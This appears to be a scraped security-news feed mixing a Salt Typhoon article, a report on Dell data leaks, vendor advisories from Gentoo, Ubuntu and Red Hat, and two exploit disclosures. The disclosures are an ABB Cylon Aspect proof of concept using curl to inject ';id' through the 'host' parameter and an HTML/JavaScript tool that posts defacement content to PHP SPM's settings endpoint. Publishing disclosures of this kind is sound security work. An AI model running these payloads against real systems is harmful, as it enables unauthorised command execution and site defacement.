The state-sponsored advanced persistent threat (APT) is going after high-value communications service provider networks in the US, potentially with a dual set of goals.

Source: BSIP SA via Alamy Stock Photo

A freshly discovered advanced persistent threat (APT) dubbed "Salt Typhoon" has reportedly infiltrated Internet service provider (ISP) networks in the US, looking to steal information and potentially set up a launchpad for disruptive attacks.

Citing "people familiar with the matter," the Wall Street Journal broke the news on Sept. 25 that the Chinese-sponsored state hackers have successfully targeted "a handful" of cable and broadband service providers during the campaign.

Other details are scant, but Salt Typhoon's efforts highlight China's priorities when it comes to geopolitical realities, researchers note.

**A Sprinkle of Espionage, A Dash of Pre-Positioning**

For instance, a position within the service provider network would offer valuable reconnaissance for how to further target high-value marks working for the federal government, law enforcement, manufacturers, military contractors, and Fortune 100 companies. 

"Obtaining access to ISPs would make it easier to survey those users of the ISPs for information on their location and what kinds of services are being accessed," says Sean McNee, vice president of research and data at DomainTools. "Bad actors could get information about the ISP's users, where they live and billing information, and what kind of access or usage they have, \[who they call, and\] text messages."

But the concern doesn't stop there. Given China's desire to control Taiwan and other assets in the region, there's very likely a military component to the campaign as well.

"Based on the recent history of Chinese-sponsored cyber campaigns and warnings from \[the Cybersecurity and Infrastructure Security Agency\] and FBI, China has escalated from surveillance-only goals toward installing an offensive capability to disrupt critical US civilian and military infrastructure," warns Sean Deuby, principal technologist at Semperis. "This could potentially range from 'blinking the lights' to dissuade US intervention to actively delaying or crippling a US response to Chinese activities."

There's precedent for that assessment. Microsoft outed Volt Typhoon in January and its alarming efforts to plant itself inside military bases, critical infrastructure assets, and telecom infrastructure — all with the goal of being able to cause outages, disrupt communications, and sow panic in the event of a kinetic conflict with the US in the South China Sea. Since then, China has denied the allegations, while the APT has been actively expanding its efforts despite its cover being blown.

**China's Recipe: Targeting Telecom, ISPs, Critical Infrastructure**

The development is the latest in a string of Chinese-sponsored efforts to subvert critical infrastructure in the US and destabilize Pacific Rim allies, many flagged by Microsoft using hurricane-related names.

For instance, a Chinese threat actor known as Flax Typhoon emerged a year ago, using legitimate tools and utilities built into the Windows operating system to carry out an extremely stealthy and persistent spy operation against entities in Taiwan. Last week, news emerged that the APT had built a 200,000-device Internet of Things (IoT) botnet in order to gain a foothold in government, military, and critical manufacturing targets in the US.

There's also the APT that Microsoft calls Brass Typhoon (aka APT41, Earth Baxia, and Wicked Panda) that recently attacked Taiwanese government agencies, Filipino and Japanese military, and energy companies in Vietnam, installing backdoors for cyberespionage purposes.  

On top of that, other China-linked groups have made a name for themselves in specifically targeting communications service providers, such as Mustang Panda, especially in Taiwan and other countries of interest.

"Chinese-backed threat actors have been conducting attacks against telcos for as long as I can remember," Semperis' Deuby says. "Historically, their goals are to create 'persistence' in the carrier. By that I mean they will infiltrate a target, gain a foothold, and then move laterally with the goal of maintaining persistence and extracting data from strategic targets as needed."

He adds that lurking and listening is a specialty: "While Chinese government actors were behind the infamous Operation Soft Cell campaign in 2019, where the threat actor stole call data records, they had infiltrated some of the telcos more than five years before being discovered."

**Communications Service Provider Defenses Need Seasoning**

The ongoing targeting of communications infrastructure should put carriers and service providers on notice to harden their defenses.

Aside from phishing and social engineering of employees, Terry Dunlap, chief security strategist at NetRise, notes that firmware and supply chain attacks using core network gear could both be attack avenues against ISPs.

"ISPs' blind spots are the firmware running their devices. Most firmware contains insecure or sloppy code that can be easily exploited, if discovered," he notes. "Another attack vector would be the supply chain. For example, if the Ethernet controller in a router or switch is supplied by a Chinese company, there are scenarios where malicious code or backdoors could be integrated into that Ethernet controller, providing an adversary easy access to that important piece of networking equipment."

In 2020, the World Economic Forum and its global partners developed a set of best practices for ISPs (PDF), including principles such as sharing threat intelligence between peers, working more closely with hardware manufacturers to increase minimum levels of security, and improving routing security, Deuby says.

Still, "as someone that's talked to many organizations about the well-understood security steps they should be taking versus their actual security posture, I'm sure plenty of gaps remain."

**About the Author**

Tara Seals has 20+ years of experience as a journalist, analyst and editor in the cybersecurity, communications and technology space. Prior to Dark Reading, Tara was Editor in Chief at Threatpost, and prior to that, the North American news lead for Infosecurity Magazine. She also spent 13 years working for Informa (formerly Virgo Publishing), as executive editor and editor-in-chief at publications focused on both the service provider and the enterprise arenas. A Texas native, she holds a B.A. from Columbia University, lives in Western Massachusetts with her family and is on a never-ending quest for good Mexican food in the Northeast.

China's 'Salt Typhoon' Cooks Up Cyberattacks on US ISPs

Dell faces its third data leak in a week as hacker “grep” continues targeting the tech giant. Sensitive…

Dell faces its third data leak in a week as hacker “grep” continues targeting the tech giant. Sensitive internal files, including project documents and MFA data, were exposed. Dell has yet to issue a formal response.

Dell has allegedly been hit with yet another data leak, marking the third such incident in a week. The threat actor, who goes by the alias “grep,” has claimed responsibility for the latest breach and continues to target the tech giant.

This time, the hacker has leaked approximately 500 MB of sensitive data, including internal documents, PDFs, images, internal device testing videos, and Multi-Factor Authentication (MFA) data, which if confirmed by Dell could further escalate concerns over the company’s data security.

According to information obtained by Hackread.com, the hacker shared details of the data leak, stating that Dell suffered a third breach that exposed internal files. The hacker revealed, “I knew Dell would fix their failure without confirming or denying my claims, for the same reason I had exfiltrated more data when I breached the internal employees, which was not leaked and waited for this exact moment.”

The leaked data includes access vectors and references to Chinese infrastructure, which, if not at a large scale, could still have some impact on the company’s operations.

The hacker on the breach forum boosted about the data leak and the leaked data was analysed by Hackread.com (Screenshot: Hackread.com)

**Leaked Data Includes Internal Tickets and Infrastructure Documents**

Among the leaked data is a CVS file titled “Ticket Summary – FY23,” which includes details of Dell’s internal ticketing system. Some of the entries shared in the leak include:

*   Incident reports on Agile access, VPN issues, proxy requirements for testing, and application migrations.
*   Ticket summaries that highlight VPN enhancements, DevOps software access requests, and network setups.

Additionally, the hacker shared a range of files and folders containing critical infrastructure information, such as:

*   “China Infra Compute.pdf”
*   “Global Project FY23.pdf” and “Global Project FY25.pdf”
*   “MFA Authentication – Cisco DUO.pdf”
*   Various project summaries and security-related documents.

The documents released by “grep” provide a snapshot of Dell’s internal operations and project infrastructure, revealing sensitive information that could pose security risks if exploited. Therefore, for security reasons; we are withholding specific details of the leaked files.

> 🚨Data Breach Update: Threat Actor Claims Third Breach of DELL
> 
> "Greg" is now claiming that DELL suffered a third data breach, this time compromising data such as "PDFs, images, videos, models, MFA data, along with their access vectors, including Chinese infrastructure."
> 
> In the… https://t.co/lTaOeC0IAL pic.twitter.com/8w3Fh9flo8
> 
> — HackManac (@H4ckManac) September 25, 2024

**Pattern of Breaches: A Coordinated Attack or Piecemeal Leaks?**

This third leak follows two previous data breaches conducted by the same hacker within a short time frame. **On September 19, 2024**, “grep” leaked data belonging to over 12,000 Dell employees, sparking an internal investigation. Just days later, **on September 22**, more sensitive internal files were released, allegedly compromised through Dell’s use of Atlassian tools.

In today’s data leak, the hacker clarified that all the data was stolen during a single breach, but he is strategically leaking it in parts. This statement eliminates speculation that Dell is facing repeated attacks, confirming instead that the data is being gradually released from one initial breach.

It is worth noting that Dell has yet to confirm the extent of the damage or whether the hacker gained access through a third-party vendor, as seen in other recent incidents. The hacker’s method aligns with his earlier attack, where he **leaked 12,000 Twilio records** from a compromised customer. Twilio confirmed to Hackread.com that it was a third-party breach, which resulted in the leak of only one Twilio customer’s data.

**Dell’s Response and Next Steps**

So far, Dell has not released a formal statement regarding today’s data leak. With three data leaks in just one week, concerns about Dell’s cybersecurity are growing. Hackread.com has reached out to Dell for comment, and this article will be updated as more information becomes available. Stay tuned!

1.  **Hacker Leaks Data of 33,000 Accenture Employees**
2.  **Acer Online Store Hacked; 34,000 Customers’ Data Stolen**
3.  **Hacker Leaks Thousands of Microsoft and Nokia Employee Data**
4.  **Shadow IT: Personal GitHub Repos Expose Employee Cloud Secrets**
5.  **Nissan Confirms Data Breach Affected 100K Customers, Employees**

Dell Hit by Third Data Leak in a Week Amid “grep” Cyberattacks

The ABB Cylon Aspect version 3.07.00 BMS/BAS controller suffers from an unauthenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the host HTTP GET parameter called by networkDiagAjax.php script.

  
ABB Cylon Aspect 3.07.00 (networkDiagAjax.php) Remote Code Execution

Vendor: ABB Ltd.  
Product web page: https://www.global.abb  
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio  
                  Firmware: <=3.07.00

Summary: ASPECT is an award-winning scalable building energy management  
and control solution designed to allow users seamless access to their  
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from an unauthenticated OS command  
injection vulnerability. This can be exploited to inject and execute arbitrary  
shell commands through the 'host' HTTP GET parameter called by networkDiagAjax.php  
script.

Tested on: GNU/Linux 3.15.10 (armv7l)  
           GNU/Linux 3.10.0 (x86_64)  
           GNU/Linux 2.6.32 (x86_64)  
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz  
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz  
           PHP/7.3.11  
           PHP/5.6.30  
           PHP/5.4.16  
           PHP/4.4.8  
           PHP/5.3.3  
           AspectFT Automation Application Server  
           lighttpd/1.4.32  
           lighttpd/1.4.18  
           Apache/2.2.15 (CentOS)  
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)  
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic (2024) and Prism Infosec (2022)  
                            @zeroscience

Advisory ID: ZSL-2024-5829  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5829.php  
CVE ID: CVE-2023-0636  
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-0636

21.04.2024

--

$ cat project

                 P   R   O   J   E   C   T

                        .|  
                        | |  
                        |'|            ._____  
                ___    |  |            |.   |' .---"|  
        _    .-'   '-. |  |     .--'|  ||   | _|    |  
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |  
     |' | |.    |    ||       | |   |  |    ||      |  
 ____|  '-'     '    ""       '-'   '-.'    '`      |____  
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░    
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                              
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░   
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░   
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               

                                                                                                               $ curl http://192.168.73.31/networkDiagAjax.php?command=traceroute&host=;id  
$ curl http://192.168.73.31/networkDiagAjax.php?command=nslookup&host=;id  
$ curl http://192.168.73.31/networkDiagAjax.php?command=ping&host=;id  
uid=33(www-data) gid=33(www-data) groups=33(www-data)

ABB Cylon Aspect 3.07.00 Remote Code Execution

Gentoo Linux Security Advisory 202409-25 - Multiple vulnerabilities have been found in Xpdf, the worst of which could result in denial of service. Versions greater than or equal to 4.05 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-25  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Xpdf: Multiple Vulnerabilities  
     Date: September 25, 2024  
     Bugs: #845027, #908037, #936407  
       ID: 202409-25

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in Xpdf, the worst of which  
could result in denial of service.

Background  
==========

Xpdf is an X viewer for PDF files.

Affected packages  
=================

Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
app-text/xpdf  < 4.05        >= 4.05

Description  
===========

Multiple vulnerabilities have been discovered in Xpdf. Please review the  
CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Xpdf users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-text/xpdf-4.05"

References  
==========

[ 1 ] CVE-2018-7453  
      https://nvd.nist.gov/vuln/detail/CVE-2018-7453  
[ 2 ] CVE-2018-16369  
      https://nvd.nist.gov/vuln/detail/CVE-2018-16369  
[ 3 ] CVE-2022-30524  
      https://nvd.nist.gov/vuln/detail/CVE-2022-30524  
[ 4 ] CVE-2022-30775  
      https://nvd.nist.gov/vuln/detail/CVE-2022-30775  
[ 5 ] CVE-2022-33108  
      https://nvd.nist.gov/vuln/detail/CVE-2022-33108  
[ 6 ] CVE-2022-36561  
      https://nvd.nist.gov/vuln/detail/CVE-2022-36561  
[ 7 ] CVE-2022-38222  
      https://nvd.nist.gov/vuln/detail/CVE-2022-38222  
[ 8 ] CVE-2022-38334  
      https://nvd.nist.gov/vuln/detail/CVE-2022-38334  
[ 9 ] CVE-2022-38928  
      https://nvd.nist.gov/vuln/detail/CVE-2022-38928  
[ 10 ] CVE-2022-41842  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41842  
[ 11 ] CVE-2022-41843  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41843  
[ 12 ] CVE-2022-41844  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41844  
[ 13 ] CVE-2022-43071  
      https://nvd.nist.gov/vuln/detail/CVE-2022-43071  
[ 14 ] CVE-2022-43295  
      https://nvd.nist.gov/vuln/detail/CVE-2022-43295  
[ 15 ] CVE-2022-45586  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45586  
[ 16 ] CVE-2022-45587  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45587  
[ 17 ] CVE-2023-2662  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2662  
[ 18 ] CVE-2023-2663  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2663  
[ 19 ] CVE-2023-2664  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2664  
[ 20 ] CVE-2023-3044  
      https://nvd.nist.gov/vuln/detail/CVE-2023-3044  
[ 21 ] CVE-2023-3436  
      https://nvd.nist.gov/vuln/detail/CVE-2023-3436

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-25

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202409-25

Ubuntu Security Notice 7034-1 - The ca-certificates package contained outdated CA certificates. This update refreshes the included certificates to those contained in the 2.64 version of the Mozilla certificate authority bundle.

==========================================================================  
Ubuntu Security Notice USN-7034-1  
September 25, 2024

ca-certificates update  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

The CA certificates in the ca-certificates package were updated.

Software Description:  
- ca-certificates: Common CA certificates

Details:

The ca-certificates package contained outdated CA certificates. This update  
refreshes the included certificates to those contained in the 2.64 version  
of the Mozilla certificate authority bundle.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS  
  ca-certificates                 20240203~22.04.1

Ubuntu 20.04 LTS  
  ca-certificates                 20240203~20.04.1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-7034-1  
  https://launchpad.net/bugs/2081875

Package Information:  
  https://launchpad.net/ubuntu/+source/ca-certificates/20240203~22.04.1  
  https://launchpad.net/ubuntu/+source/ca-certificates/20240203~20.04.1

Ubuntu Security Notice USN-7034-1

Red Hat Security Advisory 2024-7103-03 - An update for grafana-pcp is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_7103.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: grafana-pcp security updateAdvisory ID:        RHSA-2024:7103-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:7103Issue date:         2024-09-25Revision:           03CVE Names:          CVE-2024-34156====================================================================Summary: An update for grafana-pcp is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The Grafana plugin for Performance Co-Pilot includes datasources for scalable time series from pmseries and Redis, live PCP metrics and bpftrace scripts from pmdabpftrace, as well as several dashboards.Security Fix(es):* encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-34156References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2310528

Red Hat Security Advisory 2024-7103-03

Ubuntu Security Notice 7032-1 - It was discovered that Tomcat incorrectly handled HTTP trailer headers. A remote attacker could possibly use this issue to perform HTTP request smuggling.

==========================================================================  
Ubuntu Security Notice USN-7032-1  
September 24, 2024

tomcat8, tomcat9 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Tomcat could allow unintended access to network services.

Software Description:  
- tomcat9: Servlet and JSP engine  
- tomcat8: Servlet and JSP engine

Details:

It was discovered that Tomcat incorrectly handled HTTP trailer headers. A  
remote attacker could possibly use this issue to perform HTTP request  
smuggling.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  libtomcat9-java                 9.0.70-2ubuntu0.1

Ubuntu 22.04 LTS  
  libtomcat9-embed-java           9.0.58-1ubuntu0.1+esm3  
                                  Available with Ubuntu Pro  
  libtomcat9-java                 9.0.58-1ubuntu0.1+esm3  
                                  Available with Ubuntu Pro

Ubuntu 20.04 LTS  
  libtomcat9-embed-java           9.0.31-1ubuntu0.7  
  libtomcat9-java                 9.0.31-1ubuntu0.7

Ubuntu 18.04 LTS  
  libtomcat8-embed-java           8.5.39-1ubuntu1~18.04.3+esm3  
                                  Available with Ubuntu Pro  
  libtomcat8-java                 8.5.39-1ubuntu1~18.04.3+esm3  
                                  Available with Ubuntu Pro  
  libtomcat9-embed-java           9.0.16-3ubuntu0.18.04.2+esm3  
                                  Available with Ubuntu Pro  
  libtomcat9-java                 9.0.16-3ubuntu0.18.04.2+esm3  
                                  Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-7032-1  
  CVE-2023-46589

Package Information:  
  https://launchpad.net/ubuntu/+source/tomcat9/9.0.70-2ubuntu0.1  
  https://launchpad.net/ubuntu/+source/tomcat9/9.0.31-1ubuntu0.7

Ubuntu Security Notice USN-7032-1

PHP SPM version 1.0 suffers from a PHP code injection vulnerability.

=============================================================================================================================================  
| # Title     : php spm 1.0 php code injection Vulnerability                                                                                |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |  
| # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202305/kashipara.com_php-spms-zip.zip                         |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This code injects the malicious code you want into existing HTML files or creates a new HTML file and injects the payload.

[+] Line 11 Set your file name & payload.

[+] save payload as poc.html

[+] payload :

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title> PHP code injection Tool</title>  
    <script>  
        async function sendRequest() {  
            const url = document.getElementById('url').value;  
            const postData = {  
                'content[welcome]': `Hacked by indoushka`  
            };

            try {  
                const response = await fetch(`${url}/classes/SystemSettings.php?f=update_settings`, {  
                    method: 'POST',  
                    headers: {  
                        'Content-Type': 'application/x-www-form-urlencoded'  
                    },  
                    body: new URLSearchParams(postData).toString()  
                });

                if (response.ok) {  
                    document.getElementById('result').innerText = '[+] Injection in welcome page\n[+] ' + url + '/?cmd=ls -al\n';

                } else {  
                    document.getElementById('result').innerText = 'Error: ' + response.statusText;  
                }  
            } catch (error) {  
                document.getElementById('result').innerText = 'Error making request: ' + error.message;  
            }  
        }  
    </script>  
</head>  
<body>  
    <h1>Injection Tool</h1>  
    <form onsubmit="event.preventDefault(); sendRequest();">  
        <label for="url">Enter URL:</label>  
        <input type="text" id="url" name="url" required>  
        <button type="submit">Submit</button>  
    </form>  
    <pre id="result"></pre>  
</body>  
</html>

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

PHP SPM 1.0 Code Injection

Red Hat Security Advisory 2024-7102-03 - An update for grafana is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_7102.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: grafana security updateAdvisory ID:        RHSA-2024:7102-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:7102Issue date:         2024-09-25Revision:           03CVE Names:          CVE-2024-34156====================================================================Summary: An update for grafana is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Grafana is an open source, feature rich metrics dashboard and graph editor for Graphite, InfluxDB & OpenTSDB. Security Fix(es):* encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-34156References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2310528

Red Hat Security Advisory 2024-7102-03

Ubuntu Security Notice 7009-2 - Chenyuan Yang discovered that the CEC driver driver in the Linux kernel contained a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. Chenyuan Yang discovered that the USB Gadget subsystem in the Linux kernel did not properly check for the device to be enabled before writing. A local attacker could possibly use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-7009-2September 25, 2024linux-azure-fde-5.15 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-azure-fde-5.15: Linux kernel for Microsoft Azure CVM cloud systemsDetails:Chenyuan Yang discovered that the CEC driver driver in the Linux kernelcontained a use-after-free vulnerability. A local attacker could use thisto cause a denial of service (system crash) or possibly execute arbitrarycode. (CVE-2024-23848)Chenyuan Yang discovered that the USB Gadget subsystem in the Linux kerneldid not properly check for the device to be enabled before writing. A localattacker could possibly use this to cause a denial of service.(CVE-2024-25741)It was discovered that the JFS file system contained an out-of-bounds readvulnerability when printing xattr debug information. A local attacker coulduse this to cause a denial of service (system crash). (CVE-2024-40902)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - ARM64 architecture;  - M68K architecture;  - MIPS architecture;  - PowerPC architecture;  - RISC-V architecture;  - x86 architecture;  - Block layer subsystem;  - Cryptographic API;  - Accessibility subsystem;  - ACPI drivers;  - Serial ATA and Parallel ATA drivers;  - Drivers core;  - Bluetooth drivers;  - Character device driver;  - CPU frequency scaling framework;  - Hardware crypto device drivers;  - Buffer Sharing and Synchronization framework;  - DMA engine subsystem;  - FPGA Framework;  - GPIO subsystem;  - GPU drivers;  - Greybus drivers;  - HID subsystem;  - HW tracing;  - I2C subsystem;  - IIO subsystem;  - InfiniBand drivers;  - Input Device (Mouse) drivers;  - Macintosh device drivers;  - Multiple devices driver;  - Media drivers;  - VMware VMCI Driver;  - Network drivers;  - Near Field Communication (NFC) drivers;  - NVME drivers;  - Pin controllers subsystem;  - PTP clock framework;  - S/390 drivers;  - SCSI drivers;  - SoundWire subsystem;  - Greybus lights staging drivers;  - Media staging drivers;  - Thermal drivers;  - TTY drivers;  - USB subsystem;  - DesignWare USB3 driver;  - Framebuffer layer;  - ACRN Hypervisor Service Module driver;  - eCrypt file system;  - File systems infrastructure;  - Ext4 file system;  - F2FS file system;  - JFFS2 file system;  - JFS file system;  - NILFS2 file system;  - NTFS3 file system;  - SMB network file system;  - IOMMU subsystem;  - Memory management;  - Netfilter;  - BPF subsystem;  - Kernel debugger infrastructure;  - DMA mapping infrastructure;  - IRQ subsystem;  - Tracing infrastructure;  - 9P file system network protocol;  - B.A.T.M.A.N. meshing protocol;  - CAN network layer;  - Ceph Core library;  - Networking core;  - IPv4 networking;  - IPv6 networking;  - IUCV driver;  - MAC80211 subsystem;  - Multipath TCP;  - NET/ROM layer;  - NFC subsystem;  - Open vSwitch;  - Network traffic control;  - TIPC protocol;  - TLS protocol;  - Unix domain sockets;  - Wireless networking;  - XFRM subsystem;  - ALSA framework;  - SoC Audio for Freescale CPUs drivers;  - Kirkwood ASoC drivers;(CVE-2024-42076, CVE-2024-40994, CVE-2024-40932, CVE-2024-41000,CVE-2024-42224, CVE-2024-38633, CVE-2024-40954, CVE-2024-36270,CVE-2024-38623, CVE-2024-38549, CVE-2024-42225, CVE-2024-42085,CVE-2024-42157, CVE-2024-42229, CVE-2024-42109, CVE-2024-41040,CVE-2024-38607, CVE-2024-39493, CVE-2024-38546, CVE-2024-41046,CVE-2024-38567, CVE-2024-42092, CVE-2024-39501, CVE-2024-41005,CVE-2024-42223, CVE-2024-39480, CVE-2024-38571, CVE-2024-41048,CVE-2024-38605, CVE-2024-42094, CVE-2024-38598, CVE-2024-38559,CVE-2024-38558, CVE-2024-40931, CVE-2024-40942, CVE-2024-39495,CVE-2024-40981, CVE-2024-40911, CVE-2024-42148, CVE-2024-33621,CVE-2024-39502, CVE-2024-41095, CVE-2024-40960, CVE-2024-36286,CVE-2024-42232, CVE-2024-42130, CVE-2024-42154, CVE-2024-41087,CVE-2024-41004, CVE-2024-39277, CVE-2024-38560, CVE-2024-36978,CVE-2024-42089, CVE-2024-37356, CVE-2024-38547, CVE-2024-38381,CVE-2024-36015, CVE-2024-38548, CVE-2024-42120, CVE-2024-41092,CVE-2024-40978, CVE-2024-38619, CVE-2024-40914, CVE-2024-41089,CVE-2024-40988, CVE-2024-41047, CVE-2024-38565, CVE-2024-38550,CVE-2023-52887, CVE-2024-38552, CVE-2024-38583, CVE-2024-38613,CVE-2024-40967, CVE-2024-40927, CVE-2024-42124, CVE-2024-42244,CVE-2024-42152, CVE-2024-39509, CVE-2024-38662, CVE-2024-38618,CVE-2024-42140, CVE-2024-38579, CVE-2024-40945, CVE-2024-42101,CVE-2024-42104, CVE-2024-41044, CVE-2024-42161, CVE-2024-42093,CVE-2024-42270, CVE-2024-42097, CVE-2024-40970, CVE-2024-40908,CVE-2024-38582, CVE-2024-42247, CVE-2024-38661, CVE-2024-40941,CVE-2024-42084, CVE-2024-42090, CVE-2024-42131, 